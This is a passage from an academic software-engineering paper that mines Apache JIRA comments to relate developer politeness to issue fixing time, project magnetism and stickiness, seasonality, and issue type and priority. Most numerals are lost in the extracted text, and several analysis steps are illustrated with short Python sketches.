reviews into the proposed categories. the authors showed that the combined use of these techniques achieves better results (a precision of % and a recall of %) than results obtained using each technique individually (precision of % and a recall of %). pletea, vasilescu & serebrenik ( ) studied security-related discussions on github, as mined from discussions around commits and pull requests. the authors found that security-related discussions account for approximately % of all discussions on github and that more negative emotions were expressed in security-related discussions than in other discussions. these findings confirmed the importance of properly training developers to address security concerns in their applications as well as the need to test applications thoroughly for security vulnerabilities in order to reduce frustration and improve overall project atmosphere. garcia, zanetti & schweitzer ( ) analyzed the relation between the emotions and the activity of contributors in the open source software project gentoo. the case study built on extensive data sets from the project’s bug tracking platform bugzilla, to quantify the activity of contributors, and its mail archives, to quantify the emotions of contributors by means of sentiment analysis. the gentoo project is known for a period of centralization within its bug triaging community. 
this was followed by considerable changes in community organization and performance after the sudden retirement of the central contributor. the authors analyzed how this event correlated with the negative emotions, both in bilateral email discussions with the central contributor, and at the level of the whole community of contributors. the authors also extended the study to consider the activity patterns of gentoo contributors in general. they found that contributors were more likely to become inactive when they expressed strong positive or negative emotions in the bug tracker, or when they deviated from the expected value of emotions in the mailing list. the authors used these insights to develop a bayesian classifier which detected the risk of contributors leaving the project. graziotin, wang & abrahamsson ( ) conducted a qualitative interpretive study based on face-to-face open-ended interviews, in-field observations and e-mail exchanges. this enabled the authors to construct a novel explanatory theory of the impact of affects on development performance. the theory was explicated using an established taxonomy framework. the proposed theory built upon the concepts of events, affects, attractors, focus, goals, and performance. in other work graziotin, wang & abrahamsson ( ) reported the results of an investigation with participants about the relationship between the affective states, creativity, and analytical problem-solving skills of software developers. the results offered support for the claim that happy developers were better problem solvers in terms of their analytical abilities. the authors provided a better understanding of the impact of affective states on the creativity and analytical problem-solving capacities of developers, introduced and validated psychological measurements, theories, and concepts of affective states, creativity, and analytical-problem-solving skills in empirical software engineering, and raised the need for studying the human factors of software engineering by employing a multi-disciplinary viewpoint. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. rigby & hassan ( ) analyzed, using a psychometrically-based linguistic analysis tool, the five big personality traits of software developers in the apache httpd server mailing list. the authors found that two developers responsible for the major apache releases had similar personalities and their personalities were different from other developers. bazelli, hindle & stroulia ( ) analyzed questions and answers on stackoverflow.com to determine the developer personality traits, using the linguistic inquiry and word count (pennebaker, francis & booth, ). the authors found that the top reputed authors were more extroverted and expressed less negative emotions than authors of down voted posts. tourani, jiang & adams ( ) evaluated the use of automatic sentiment analysis to identify distress or happiness in a team of developers. they extracted sentiment values from the mailing lists of two mature projects of the apache software foundation, considering developers and users. the authors found that an automatic sentiment analysis tool obtained low precision on email messages (due to long size of the analyzed text) and that users and developers express positive and negative sentiment on mailing lists. murgia et al. ( b) analyzed whether issue reports carried any emotional information about software development. 
the authors found that issue reports contain emotions regarding design choices, maintenance activity or colleagues. gómez et al. ( ) performed an experiment to evaluate whether the level of extraversion in a team influenced the final quality of the software products obtained and the satisfaction perceived while this work was being carried out. results indicated that when forming work teams, project managers should carry out a personality test in order to balance the amount of extraverted team members with those who are not extraverted. this would permit the team members to feel satisfied with the work carried out by the team without reducing the quality of the software products developed. acuña, gómez & juristo ( ), performed empirical research examining the work climate within software development teams. the authors attempted to understand if team climate (defined as the shared perceptions of team work procedures and practices) bore any relation to software product quality. they found that high team vision preferences and high participative safety perceptions of the team were significantly related to better software. in a study conducted by fagerholm et al. ( ), it was shown that software teams engaged in a constant cycle of interpreting their performance. thus, enhancing performance experiences requires integration of communication, team spirit and team identity into the development process. jongeling, datta & serebrenik ( ) studied whether the sentiment analysis tools agreed with the sentiment recognized by human evaluators as well as with each other. furthermore, the authors evaluated the impact of the choice of a sentiment analysis tool on software engineering studies by conducting a simple study of differences in issue resolution times for positive, negative and neutral texts. the authors repeated the study for seven datasets and different sentiment analysis tools and observed that the disagreement between the tools can lead to contradictory conclusions. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table selected projects statistics. project # of comments # of developers hbase , hadoop common , , derby , lucene core , , hadoop hdfs , cassandra , , solr , , hive , hadoop map/reduce , harmony , ofbiz , infrastructure , , camel , zookeeper , geoserver , geronimo , groovy , , hibernate orm , , jboss , jruby , , pig , wicket , , tot , , experimental setup dataset we built our dataset collecting data from the apache software foundation issue tracking system, jira (https://www.atlassian.com/software/jira). an issue tracking system (its) is a repository used by software developers to support the software development process. it supports corrective maintenance activity like bug tracking systems, along with other types of maintenance requests. we mined the its of the apache software foundation collecting issues from october to december . in order to create our dataset, since the focus of our study was about the usefulness of agile boards, we selected projects for which the jira agile board contained a significant amount of activity. namely, we selected those systems for which the agile board contained more than , comments (in order to build a time series with sufficient data) and there was a recorded monthly activity (i.e., developers were active for every considered month). the jira dataset contains roughly , projects, of which characterised by more than , comments. 
table shows the corpus of projects selected for our analysis, highlighting the number of comments recorded for each project and the number of developers involved. users' names are reported as <dev_name_a> for the sake of privacy.

table examples of polite and impolite comments as classified by the tool.
polite:
• hey <dev_name_a>, would you be interested in contributing a fix and a test case for this as well? thanks, <dev_name_b>
• <dev_name>, can you open a new jira for those suggestions? i'll be happy to review.
• <dev_name>, the latest patch isn't applying cleanly to trunk - could you resubmit it please? thanks.
• <dev_name>, since you can reproduce, do you still want the logs? i think i still have them if needed.
impolite:
• why are you cloning tickets? don't do that.
• shouldnt it check for existence of tarball even before it tries to allocate and error out ???
• <dev_name_a>, why no unit test? <dev_name_b>, why didn't you wait for + from hudson???
• > this isn't the forum to clarify why not? the question is whether this is redundant with cascading, so comparisons are certainly relevant, no?

comments politeness
given some texts, the tool developed by danescu-niculescu-mizil et al. ( ) calculates the politeness of their sentences, providing one of two possible labels as result: polite or impolite. table shows some examples of polite and impolite comments as classified by the tool.

figure example of timeline for a jira issue.

we evaluated the percentage of polite comments per month, considering all comments posted in a certain month. for each comment we assigned a value according to the following rules:
• a value of + for those comments marked as polite by the tool;
• a value of − for those comments marked as impolite.
finally, we calculated the percentage of polite comments for a certain month. we analyzed the politeness of about k comments.

issue politeness
the next step was to infer the politeness of issues from the politeness of their comments. for each issue we evaluated the politeness expressed in its comments and then divided the issues into three groups: polite issues (commented only with polite comments), impolite issues (commented only with impolite comments) and mixed issues (commented with both polite and impolite comments). our dataset contains in total , issues; . % ( , ) of the total were classified as polite, . % ( , ) as impolite and . % ( , ) as mixed. for each of these three groups of issues we evaluated the issue fixing time as the difference between resolution and creation time. figure shows the typical issue timeline in jira:
• tcr represents the time when an issue is created;
• tcl represents the time when an issue is closed;
• ta represents the time when an issue is assigned to a developer;
• ts is the time when a developer subscribes to an issue that has been assigned to them.
to infer the issue fixing time (abbreviated as ift), we used the approach proposed by murgia et al. ( a).
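a minimal sketch of the aggregation just described: each comment carries a polite/impolite label (assumed here to have been produced beforehand by the danescu-niculescu-mizil et al. classifier, whose invocation is not shown), the monthly percentage of polite comments is derived from the comment scores, and issues are grouped as polite, impolite or mixed. file and column names are hypothetical.

```python
import pandas as pd

# hypothetical input: one row per comment, with a precomputed politeness label
comments = pd.read_csv("comments_with_politeness.csv", parse_dates=["created"])
# expected columns: project, issue_key, created, label  (label in {"polite", "impolite"})

# score each comment: +1 if polite, -1 if impolite (assumed scoring values)
comments["score"] = comments["label"].map({"polite": 1, "impolite": -1})
comments["month"] = comments["created"].dt.to_period("M")

# percentage of polite comments per project and month
polite_pct = (
    comments.groupby(["project", "month"])["score"]
    .apply(lambda s: 100.0 * (s > 0).mean())
    .rename("polite_pct")
)

# issue-level politeness: polite, impolite, or mixed
def issue_class(labels):
    kinds = set(labels)
    if kinds == {"polite"}:
        return "polite"
    if kinds == {"impolite"}:
        return "impolite"
    return "mixed"

issue_politeness = comments.groupby("issue_key")["label"].apply(issue_class)
print(issue_politeness.value_counts(normalize=True).round(3))
```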
we computed the time interval between the last time an issue had been closed and the last time it had been subscribed to by an assignee. attractiveness our research focuses around the concepts developed by yamashita et al. ( ) and yamashita et al. ( ) who introduced the concepts of magnetism and stickiness for destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we consider as active all developers who posted/commented/resolved/modified an issue during the observed time (from dev_ to dev_ ). figure example of magnetism and stickiness metrics computation in . a software project. a project is classified as magnetic if it has the ability to attract new developers over time. stickiness is the ability of a project to keep its developers over time. we measured these two metrics by considering the period of observation of one year. figure shows an example of the evaluation of magnetism and stickiness metrics. in this example, we were interested in calculating the value of magnetism and stickiness for . from to , we had a total of active developers. in , there were seven active developers and of them (highlighted with black heads) were new. only (highlighted with grey heads) of the seven active developers in were also active in . we can then calculate the magnetism and stickiness as follows: • magnetism is the fraction of new active developers during the observed time interval, in our example / (dev_ and dev_ were active in but not in ). • stickiness is the fraction of active developers that were also active during next time interval, in our example / (dev_ , dev_ , dev_ were active in and in ). data analysis to perform statistical testing, filter the data and produce the visualisation of the results, we used scikit-learn (http://scikit-learn.org/stable/) for rq , and the r projects for statistical computing (r development core team, ) for the other rqs. to facilitate replication of our study, we have created a replication package (https://bitbucket.org/giuseppedestefanis/ peerjcs_replicationpackage) which contains the dataset, the tool used to detect politeness and the r and python scripts for performing the statistical analysis. results does a relationship exist between politeness and issues fixing time? motivation. murgia et al. ( a) demonstrated the influence of maintenance type on the issue fixing time, while zhang, gong & versteeg ( ) developed a prediction model for bug fixing time for commercial software. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://scikit-learn.org/stable/ https://bitbucket.org/giuseppedestefanis/peerjcs_replicationpackage https://bitbucket.org/giuseppedestefanis/peerjcs_replicationpackage http://dx.doi.org/ . /peerj-cs. in another study, zhang et al. ( ) analyzed the interval between bug assignment and the time when bug fixing starts (bugs are classified as a type of issue in jira). after a bug being reported and assigned, some developers will immediately start fixing the bug while others will start bug fixing after a long period. the authors explored the delays of developers empirically analyzing three open source software systems. they studied factors affecting bug fixing time along three dimensions (bug reports, source code involved in the fix and code changes that are required to fix the bug) and compared such factors using logistic regression models. 
the most influential factors on bug fixing appeared to be the severity of a bug, its description and comments, and the operating system where the bug was found. hence, there are indeed many factors able to influence bug fixing time and issue fixing time; in this case, we were interested in finding out whether the politeness expressed by developers in comments had an influence on issue fixing time.

to detect differences among the fixing times of polite, impolite and mixed issues, we used the kruskal–wallis test. such a test is non-parametric and unpaired (siegel, ; kruskal & wallis, ; weiss et al., ). the test can be used with no restrictions or hypotheses on the statistical distribution of the sample populations, and it is suitable for comparing differences among the medians of two or more populations when their distributions are not gaussian. we grouped all the issues (by category) of all the projects contained in our corpus and then tested the null hypothesis h : the three distributions of issue fixing time are equal for the three typologies of considered issues (polite, impolite, mixed). the outcome of the kruskal–wallis test is a p-value p < , indicating that the three distributions are statistically different.

figure shows the box-plot of the issue fixing time for the three groups of issues considered (polite, impolite and mixed) for all the issues analysed. the issue fixing time is expressed in hours on a logarithmic scale. the median of the issue fixing time for polite issues is shorter than that for impolite and mixed issues, while the median for impolite issues is shorter than the one for mixed issues. figure also shows that the percentage of impolite issues is the highest ( . %), followed by mixed issues ( . %) and then polite issues ( . %). figures and show the boxplots of the issue fixing time when considering single projects. we considered the four projects (hadoop hdfs, derby, lucene-core, hadoop map/reduce) with the highest number of comments in our corpus as examples. for visualising the boxplots of figs. and , we grouped the issues by project and then by category. the results obtained with all the issues grouped together (without distinguishing by project) are confirmed with these four examples: the median for polite issues is lower than the other two medians, and also in these cases issues with mixed polite and impolite comments have a longer issue fixing time than issues with impolite comments.

figure box-plot of the fixing-time expressed in hours. the number in parentheses next to each issue group indicates the percentage of issues.
figure box-plot of the fixing-time expressed in hours for single projects. the number in parentheses next to polite/impolite indicates the percentage of impolite and polite issues.

findings. issue fixing time for polite issues is shorter than issue fixing time for impolite and mixed issues.

does politeness among developers affect the attractiveness of a project?
motivation. magnetism and stickiness are two interesting metrics able to describe the general health of a project: if a project is able to attract new developers and to keep them over time, we can conclude that the project is healthy. on the other hand, if a project is not magnetic and not sticky, we can conclude that the project is losing developers and is not attracting new developers over time.
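the magnetism and stickiness computation illustrated in the example of the previous section reduces to set operations over the developers active in consecutive observation intervals. the snippet below is an illustration under the stated definitions (yearly intervals, as in the figure; the same code applies to monthly intervals); the activity log format is hypothetical, and the choice of denominator for magnetism follows one common reading of the definition.

```python
import pandas as pd

# hypothetical activity log: one row per developer action on an issue
events = pd.read_csv("jira_activity.csv", parse_dates=["timestamp"])
# expected columns: developer, issue_key, timestamp
events["year"] = events["timestamp"].dt.year

# set of active developers per year
active = events.groupby("year")["developer"].apply(set)

def magnetism_stickiness(active, year):
    """magnetism: fraction of developers active in `year` that were not active
    in the previous interval (denominator: all developers active in `year`).
    stickiness: fraction of developers active in the previous interval that
    are still active in `year`."""
    prev = active.get(year - 1, set())
    curr = active.get(year, set())
    magnetism = len(curr - prev) / len(curr) if curr else 0.0
    stickiness = len(prev & curr) / len(prev) if prev else 0.0
    return magnetism, stickiness

for year in sorted(active.index)[1:]:
    m, s = magnetism_stickiness(active, year)
    print(year, f"magnetism={m:.2f}", f"stickiness={s:.2f}")
```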
although there may be many factors influencing magnetism and stickiness, we were interested in analysing the correlation between the politeness expressed by developers in their comments and these two metrics. to detect whether there was a direct correlation between the magnetism and stickiness of a project and politeness, we considered an observation time of one month. during this time interval we measured magnetism, stickiness and the percentage of polite comments. since we had no evidence that the politeness in the observed time could affect magnetism and stickiness in the same time interval or in the following observation time, we evaluated a cross-correlation coefficient.

figure box-plot of the fixing-time expressed in hours for single projects. the number in parentheses next to polite/impolite indicates the percentage of impolite and polite issues.

to study the cross-correlation, we first studied the time series for stationarity. a time series xt (t = , , ...) is considered to be stationary if its statistical properties (autocorrelation, variance, expectation) do not vary with time (priestley, ; priestley, ; hamilton, ). time series stationarity is a condition required for calculating the most common correlation coefficient; however, it is still possible to study cross-correlation between time series which are not stationary (kristoufek, ). we used the r package fpp (https://cran.r-project.org/package=fpp) and we applied:
• the ljung–box test (box & pierce, ; ljung & box, ): this test for stationarity confirms independence of increments, where rejection of the null hypothesis h indicates stationarity (the null hypothesis h is that the data are non-stationary);
• the augmented dickey-fuller (adf) t-statistic test (said & dickey, ; diebold & rudebusch, ; banerjee et al., ): the null hypothesis h is that the data are non-stationary (small p-values, e.g., less than . , suggest that the time series is stationary);
• the kwiatkowski-phillips-schmidt-shin (kpss) test (kwiatkowski et al., ): this test reverses the hypotheses, hence the null hypothesis h is that the time series is stationary (small p-values, e.g., less than . , suggest that the time series is not stationary).
we decided to proceed using the results obtained from the three tests and to consider the worst case scenario: even if only one test out of three indicated rejection of the hypothesis of stationarity for a given time series, we considered that time series as non-stationary.

the results of the three tests are shown in table . the cells in grey indicate that the p-value for the corresponding test is below % (our cutoff for significance), thus we infer in these cases that the test indicates stationarity; on the contrary, cells in white indicate that the p-value for the corresponding test is above %.

table p-value results for the stationarity tests (ljung–box, augmented dickey-fuller, kpss) applied to the politeness, magnetism and stickiness time series of each project.

for example, for the percentage of polite comments time series of hbase (row , first three cells), the first two tests (box-ljung and augmented dickey-fuller) suggest stationarity, while the third test (kpss) rejects the hypothesis of stationarity. for the majority of the cases, the tests provide discordant results; only for the magnetism of infrastructure (row ) and geoserver (row ) is there agreement among the three tests. thus, we considered all the time series in table , except for the cases mentioned before, as not stationary. table shows the results obtained by applying the algorithm illustrated in kristoufek ( ) (http://stats.stackexchange.com/questions/ /code-for-detrended-cross-correlation-in-r). for the majority of the cases there is a weak positive correlation between politeness and magnetism ( projects out of ) and between politeness and stickiness ( projects out of ).

we also calculated the cross-correlation (using the ccf function in r) after applying time series differencing to transform the time series that were not stationary in table into stationary ones. the differencing operator with lag d, applied to a time series k, creates a new series whose value at time t is the difference between k(t + d) and k(t); this method is useful for removing cycles and trends.

table cross-correlation between politeness and magnetism and between politeness and stickiness for the non-stationary series.

figure differencing time-series.

as an example, fig. a shows the magnetism time series for lucene core. from table , row , we can see that the time series is not stationary, since all three tests failed to indicate stationarity. by applying the differencing operator (first differencing), we obtain the new time series in fig. b. the new time series in fig. b is stationary: all three tests provide the same indication of stationarity (box-ljung: p-value = . e− , augmented dickey-fuller: p-value = . , kpss: p-value = . ) and the plot appears roughly horizontal (visual inspection is a practical rule of thumb which can help when evaluating a time series for stationarity).

figure cross-correlation—lucene core.

if the time series under study are stationary, it is possible to calculate the cross-correlation. the cross-correlation function (ccf) is defined as the set of correlations (the height of the vertical line segments in fig. ) between two time series x(t + h) and y(t) for lags h = 0, ±1, ±2, ....
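the r-based pipeline described above (ljung–box, adf and kpss checks, first differencing of non-stationary series, then cross-correlation) has close equivalents in statsmodels. the sketch below applies the same worst-case stationarity rule and then computes the ccf on the differenced series; the synthetic data and parameter choices are illustrative only, and statsmodels' ccf returns non-negative lags, so both call orders are needed to inspect both sides of the lag axis.

```python
import numpy as np
import pandas as pd
from statsmodels.stats.diagnostic import acorr_ljungbox
from statsmodels.tsa.stattools import adfuller, kpss, ccf

# synthetic monthly series standing in for one project (placeholder data)
rng = np.random.default_rng(0)
polite = pd.Series(60 + np.cumsum(rng.normal(0, 1.0, 48)))    # % polite comments
magnet = pd.Series(0.3 + np.cumsum(rng.normal(0, 0.01, 48)))  # magnetism

def is_stationary(series, alpha=0.05):
    """worst-case rule used in the text: a series is treated as stationary only
    if all three tests point to stationarity (ljung-box and adf reject their
    null of non-stationarity, kpss does not reject its null of stationarity)."""
    lb_p = acorr_ljungbox(series, lags=[12], return_df=True)["lb_pvalue"].iloc[0]
    adf_p = adfuller(series)[1]
    kpss_p = kpss(series, nlags="auto")[1]
    return (lb_p < alpha) and (adf_p < alpha) and (kpss_p >= alpha)

series = {"polite": polite, "magnet": magnet}
diffed = {name: (s if is_stationary(s) else pd.Series(np.diff(s)))
          for name, s in series.items()}

# align lengths (differencing drops one observation) before the ccf
n = min(len(diffed["polite"]), len(diffed["magnet"]))
a = diffed["polite"].iloc[-n:].to_numpy()
b = diffed["magnet"].iloc[-n:].to_numpy()

fwd = ccf(a, b, adjusted=False)[:7]   # lags 0..6, polite vs magnet
bwd = ccf(b, a, adjusted=False)[:7]   # lags 0..6, magnet vs polite
print("ccf(polite, magnet) lags 0..6:", np.round(fwd, 2))
print("ccf(magnet, polite) lags 0..6:", np.round(bwd, 2))
```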
a negative value of h represents a correlation between the x-series at a time before t and the y-series at time t: for a negative lag, the cross-correlation value gives the correlation between the earlier values of the x-series and y(t). negative values of the ccf correspond to anti-correlated events. the ccf helps to identify lags of x(t) that could be predictors of the y(t) series:
• when h < 0 (left side of the plots in figs. a and b), x leads y;
• when h > 0 (right side of the plots in figs. a and b), y leads x.
table shows the maximum value of the cross-correlation coefficient between the percentage of polite comments and magnetism, and between the percentage of polite comments and stickiness, together with the lag (or lags) at which the maximum value occurs. the values are calculated using the r function ccf. a negative lag x means that the current values of stickiness are likely to be higher if the percentage of polite comments was higher x months before; on the other hand, a positive lag z means that a currently higher percentage of polite comments is linked with higher magnetism z months later. for both magnetism and stickiness, we observe that a positive maximum correlation exists. the differences in lags presented in table could be explained by looking at the composition of our corpus: we selected the projects with a higher number of comments from jira, regardless of domain, history and/or programming language used. additionally, some systems are younger than others and, as a consequence, the time series may have different lengths.

findings. magnetism and stickiness are positively correlated with the percentage of polite comments.

table politeness vs magnetism and stickiness: maximum cross-correlation coefficient and corresponding lag(s) for each project.

does the percentage of polite comments vary over time?
motivation. politeness has an influence on the productivity of a team (ortu et al., b; ortu et al., a; ortu et al., c). thus, it is interesting to understand whether there are periods of time in which the level of politeness decreases (potentially affecting the productivity of a team). we calculated the level of politeness for any given issue and then plotted the percentage of polite comments per month, grouping issues per project. for each project considered in this study, the percentage of polite comments over time can be seen as a time series, hence we performed tests for randomness and seasonality to understand the nature of the politeness time series. a time series is considered random if it consists of independent values from the same distribution. we used the bartels test (bartels, ) for studying randomness (brockwell & davis, ), and the results of the augmented dickey-fuller test and kpss test from 'does politeness among developers affect the attractiveness of a project?' for studying seasonality. we used the r package randtests (https://cran.r-project.org/web/packages/randtests/randtests.pdf) and we applied:
• the bartels test: the null hypothesis h of randomness is tested against non-randomness.
for studying the seasonality of the percentage of polite comments time series, we considered the results (from 'does politeness among developers affect the attractiveness of a project?') of the following tests:
• the augmented dickey-fuller test: the null hypothesis h is that the data are non-stationary and non-seasonal;
• the kwiatkowski-phillips-schmidt-shin (kpss) test: the null hypothesis h is that the data are stationary and non-seasonal.

table randomness and seasonality test results (bartels rank, augmented dickey-fuller and kpss p-values) for the politeness time series of each project.

the results of the tests are shown in table . for randomness, the cells in grey indicate that the p-value for the corresponding test is higher than % (our cutoff for significance), thus we infer in these cases that the test indicates randomness (null hypothesis h of randomness); on the contrary, cells in white indicate that the p-value for the corresponding test is lower than %. in the majority of the cases ( out of ), the percentage of polite comments time series were not random. for seasonality, the cells in grey indicate that the p-value for the corresponding test is less than % (our cutoff for significance), thus we infer in these cases that the test rejects the null hypothesis h of non-seasonality. table shows that, for the augmented dickey-fuller test, twelve projects (hbase, derby, lucene core, cassandra, harmony, ofbiz, infrastructure, camel, geoserver, geronimo, groovy, jboss) have a percentage of polite comments time series which presents seasonality, while the remaining time series are not seasonal. for the kpss test, the null hypothesis of non-seasonality is rejected for time series (out of ).

it is interesting to note that there are variations in the percentage of polite comments over time. this is by no means a representation of time dynamics, but simply random variation of the percentage of polite comments over time. cassandra and ofbiz present seasonality (table ) and fig. shows the seasonal component determined using the stl function (https://stat.ethz.ch/r-manual/r-devel/library/stats/html/stl.html) in r. in cassandra, fig. (a), and ofbiz, fig. (b), we see how the percentage of polite comments decreases for some time intervals and increases for others. it is also possible to analyse the trend of the percentage of polite comments: while for cassandra the trend is increasing starting from the year , for ofbiz the trend is decreasing.

findings. the percentage of polite comments does vary over time and in some cases it changes from a lower percentage of polite comments to a higher percentage of polite comments between two consecutive observation intervals. this fact could be related to the composition of our corpus: we considered only open source systems, hence there are no strict deadlines or particular busy days (such as fridays, as suggested by śliwerski, zimmermann & zeller ( )).
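the seasonal component discussed above was obtained with r's stl function; statsmodels offers an equivalent stl implementation. the sketch below decomposes a synthetic monthly politeness series into trend, seasonal and residual components; the data, the yearly period and the robust setting are illustrative assumptions, not the original analysis.

```python
import numpy as np
import pandas as pd
from statsmodels.tsa.seasonal import STL

# synthetic monthly percentage of polite comments (placeholder data)
rng = np.random.default_rng(1)
idx = pd.date_range("2012-01-01", periods=48, freq="MS")
seasonal = 5 * np.sin(2 * np.pi * np.arange(48) / 12)
polite_pct = pd.Series(65 + 0.1 * np.arange(48) + seasonal + rng.normal(0, 2, 48),
                       index=idx)

# period=12: monthly observations with a yearly seasonal cycle (assumed)
res = STL(polite_pct, period=12, robust=True).fit()

print("trend change over the window:",
      round(res.trend.iloc[-1] - res.trend.iloc[0], 2))
print("largest seasonal swing:",
      round(res.seasonal.max() - res.seasonal.min(), 2))
```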
how does politeness vary with respect to jira maintenance types and issue priorities? motivation. understanding which typology of issue attracts more impolite comments could help both managers and developers better understand the development process and take action to better manage the distribution of issues within development teams. a classification of the type of issues, is provided on the jira wiki (https: //cwiki.apache.org/confluence/display/flume/classification+of+jira+issues). the following list gives a brief introduction: • bug: this type of issue indicates a defect in the source code, such as logic errors, out-of-memory errors, memory leaks and run-time errors. any failure of the product to perform as expected and any other unexpected or unwanted behaviour can be registered as type bug. • subtask: this type of issue indicates that a task must be completed as an element of a larger and more complex task. subtask issues are useful for dividing a parent issue into a number of smaller tasks, more manageable units that can be assigned and tracked separately. • task: this type of issue indicates a task that it is compulsory to complete. • improvement: this type of issue indicates an improvement or enhancement to an existing feature of the system. • new feature: this type of issue indicates a new feature of the product yet to be developed. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://stat.ethz.ch/r-manual/r-devel/library/stats/html/stl.html https://cwiki.apache.org/confluence/display/flume/classification+of+jira+issues https://cwiki.apache.org/confluence/display/flume/classification+of+jira+issues http://dx.doi.org/ . /peerj-cs. figure time series decomposition. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table maintenance statistics. type impolite polite bug , , sub-task , , task , , improvement , , new feature , , wish test new jira project brainstorming umbrella table priority statistics. priotity impolite polite blocker , , critical , , major , , minor , , optional trivial , , • wish: this type of issue is used to track general wishlist items, which could be classified as new features or improvements for the system under development. • test: this type of issue can be used to track a new unit or integration test. • new jira project: this type of issue indicates the request for a new jira project to be set up. • brainstorming: this type of issue is more suitable for items in their early stage of formation not yet mature enough to be labelled as a task or new feature. it provides a bucket where thoughts and ideas from interested parties can be recorded as the discussion and exchange of ideas progresses. once a resolution is made, a task can be created with all the details defined during the brainstorming phase. • umbrella: this type of issue is an overarching type comprised of one or more sub-tasks. tables and provide information about the absolute number of issues (maintenance e priority) in our corpus. to detect the level of politeness for each category of issue, we grouped the issue comments for type of maintenance and priority. to justify claims such as ‘‘issues of type a tend to have more polite comments than issues of type b’’, we used the multiple contrast test procedure (konietschke, hothorn & brunner, ) using a % error rate. 
instead of following a classical two-step approach, in which a global null hypothesis is tested first and, as a second step, multiple comparisons are used to test sub-hypotheses related to each pair of groups, to answer our research question we used tukey's test (tukey, ), which is a single-step multiple comparison procedure and statistical test.

table maintenance—significant results: lower and upper bounds of the simultaneous confidence intervals and p-values for the pairs improvement—bug, new feature—bug, new feature—improvement, task—improvement, sub-task—new feature, task—new feature, test—new feature, wish—new feature, task—sub-task and test—task.

to visualize the results obtained from the multiple contrast test procedure, we used the t̃-graph presented by vasilescu et al. ( a). this visual comparison of multiple distributions using t̃-graphs provides an immediate understanding of the groups located in higher positions in the graph, i.e., issue categories with higher politeness, while groups located in lower positions in the graph are related to issue categories with lower politeness. other studies related to the application of t-graphs can be found in vasilescu, filkov & serebrenik ( ) and vasilescu et al. ( b). the approach used to build a t̃-graph is the following (cf. vasilescu et al. ( a)):
• for each pair of groups it is necessary to analyse the % confidence interval to test whether the corresponding null sub-hypothesis can be rejected;
• if the lower boundary of the interval is greater than zero for groups a and b, we conclude that the metric value is higher in a than in b;
• if the upper boundary of the interval is less than zero for groups a and b, we conclude that the metric value is lower in a than in b;
• if the lower boundary of the interval is less than zero and the upper boundary is greater than zero, we conclude that the data does not provide enough evidence to reject the null hypothesis;
• based on the results of the comparisons, we construct the graph with nodes being groups and with an edge (a, b) if the metric value is higher in a than in b.
the results of the multiple contrast test procedure are presented in tables and . we used the mctp function for tukey's test, from the nparcomp r package (https://cran.r-project.org/web/packages/nparcomp/nparcomp.pdf), to obtain the tables. table summarises the significant results which we used to build the t̃-graph. for the category brainstorming, the lower boundary of the interval is less than zero and the upper boundary is greater than zero; in this situation the data does not provide enough evidence and we cannot conclude that, for example, brainstorming issues are more (or less) polite than bug issues. the same happens for the categories umbrella and new jira project.

figure t̃-graph for issue maintenance.

table issue priority classification: lower and upper bounds of the simultaneous confidence intervals and p-values for the pairs critical—blocker, major—blocker, minor—blocker, trivial—blocker, major—critical, minor—critical, trivial—critical, minor—major, trivial—major and trivial—minor.

figure shows the t̃-graph resulting from the values in table .
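the bulleted procedure above translates directly into code: read each pair's simultaneous confidence interval, add a directed edge when the interval lies entirely on one side of zero, and skip pairs whose interval straddles zero. the sketch below uses plain dictionaries and hypothetical interval values (the actual values belong to the tables above and are not reproduced here).

```python
# each pair (a, b) maps to the (lower, upper) bounds of the simultaneous
# confidence interval for "politeness(a) - politeness(b)".
# the values below are placeholders, not the values of the tables above.
intervals = {
    ("improvement", "bug"): (0.02, 0.05),
    ("new feature", "bug"): (0.03, 0.07),
    ("new feature", "improvement"): (0.01, 0.04),
    ("task", "improvement"): (-0.05, -0.02),
    ("sub-task", "new feature"): (-0.06, -0.01),
    ("brainstorming", "bug"): (-0.02, 0.03),   # straddles zero: no edge
}

edges = []  # edge (a, b) means "a is more polite than b"
for (a, b), (lower, upper) in intervals.items():
    if lower > 0:        # whole interval above zero: a higher than b
        edges.append((a, b))
    elif upper < 0:      # whole interval below zero: b higher than a
        edges.append((b, a))
    # otherwise: not enough evidence, no edge

# adjacency-list view of the resulting t-graph
graph = {}
for a, b in edges:
    graph.setdefault(a, []).append(b)
print(graph)
```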
the category new feature is more polite than test, sub-task, improvement and wish; test, sub-task and improvement are more polite than task; improvement are more polite than bug. issues with maintenance bug are related to defects and software failures. this category presents the lower politeness. issues with maintenance new feature are proposals made by developers and it is interesting to see that when proposing something new, developers tend to be more polite. issues on jira are also classified considering the level of priority, as major, minor, blocker (e.g., an issue which blocks development and/or testing work), critical and trivial. table shows the results of the multiple contrast test procedure for the different groups of issue priority. figure shows the associated t⇠ -graph. blocker and critical issues are more polite than major, minor and trivial issues. major issues are more polite than minor and trivial, while minor are more polite than trivial. trivial issues are characterised by lower politeness. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure t⇠ -graph for issue priority. findings. comments related to issues with maintenance bug, priority minor and trivial, tended to have a lower politeness. issues with maintenance new feature, priority blocker and critical, tended to have a higher politeness. discussion software development, as well as other fields, is an activity organised around team- based environments. the implementation of team structures is not simple and does not necessarily result in success, because it is not enough just to put people together in teams and to presume that everybody knows or agrees on what to do (allen & hecht, ). people working together apply different personal assumptions and interpretations to their work tasks (keyton & beck, ). hence, conflicts within teams are possible. conflicts affect teams’ productivity and team leaders are certainly interested in knowing how to prevent, destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. avoid, or, in the worst case, manage conflicts which might occur. in this paper, we presented an analysis about the links between politeness and productivity of developers involved in a project. politeness is a factor that certainly helps in diminishing conflict and friction between people. the findings of this study contribute in highlighting the importance and the impact of the psychological state of a developer on the software production process. we started the paper by proposing that politeness information mined from software repositories like issue repositories could offer a way to investigate productivity during the software development process. we showed that issue fixing time for polite issues was shorter than issue fixing time for impolite and mixed-issues. this result matches common sense; if 